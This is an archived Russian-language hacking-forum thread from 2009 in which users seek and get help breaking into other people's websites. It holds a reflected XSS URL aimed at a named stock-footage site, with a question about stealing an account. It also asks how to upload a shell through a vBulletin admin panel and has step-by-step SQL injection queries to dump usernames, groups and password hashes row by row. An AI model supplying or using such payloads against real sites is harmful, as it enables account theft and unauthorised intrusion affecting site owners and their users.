ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.05.2009, 14:23
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
аааа это я по думал чтото другое типа лексики хакера ну извените
|
|
|
07.05.2009, 14:51
|
|
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842
Репутация:
239
|
|
Всем привет. Поджскажите мне плиз, реально ли как-то получить аккаунт с помошью такой вот уязвимости?
http://footage.shutterstock.com/videos.html?clipbox_id=255910%22%3E%3Cscript%3Eale rt(/d/)%3C/script%3E
там просто четкие фотки и видео ХД хочу писец ))
|
|
|
|
07.05.2009, 15:23
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Версия форума vBulletin 3.5.8
В какой таблице пассы админа?
Как залить шелл через админку?
|
|
|
|
07.05.2009, 15:26
|
|
Banned
Регистрация: 06.05.2009
Сообщений: 13
Провел на форуме:
20431
Репутация:
-2
|
|
Помогите со sql запросом:
Имя базы: dbforum1
Имя таблицы: ibf_members
Имена нужных строк: name, mgroup, password
Покажите на примере как запросить эти данные у пользователя с id=399999
Или у пользователя с name=LOL
UNION SELECT...
PS: Можно внедрять только один параметр.
|
|
|
|
07.05.2009, 15:32
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members
|
|
|
|
07.05.2009, 15:35
|
|
Banned
Регистрация: 06.05.2009
Сообщений: 13
Провел на форуме:
20431
Репутация:
-2
|
|
Сообщение от Spyder
select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members
а where id, where name ненадо? 
Я в sql неразбираюсь просто
|
|
|
|
07.05.2009, 15:37
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
where+name='LOL'
|
|
|
|
07.05.2009, 15:39
|
|
Banned
Регистрация: 06.05.2009
Сообщений: 13
Провел на форуме:
20431
Репутация:
-2
|
|
Сообщение от Spyder
select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members
А-а-а Спасибо, получилось имя вывести, Огромный тебе РЕСПЕКТ.
Подскажи пожайлуйста как посмотреть вторую, третью, 545788 строчку 
|
|
|
|
07.05.2009, 15:40
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Serge24
А-а-а Спасибо, получилось имя вывести, Огромный тебе РЕСПЕКТ.
Подскажи пожайлуйста как посмотреть вторую, третью, 545788 строчку select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 1,1
select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 545788,1
|
|
|
|
07.05.2009, 15:43
|
|
Banned
Регистрация: 06.05.2009
Сообщений: 13
Провел на форуме:
20431
Репутация:
-2
|
|
Сообщение от R1dex
where+name='LOL'
Там так не получится 
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
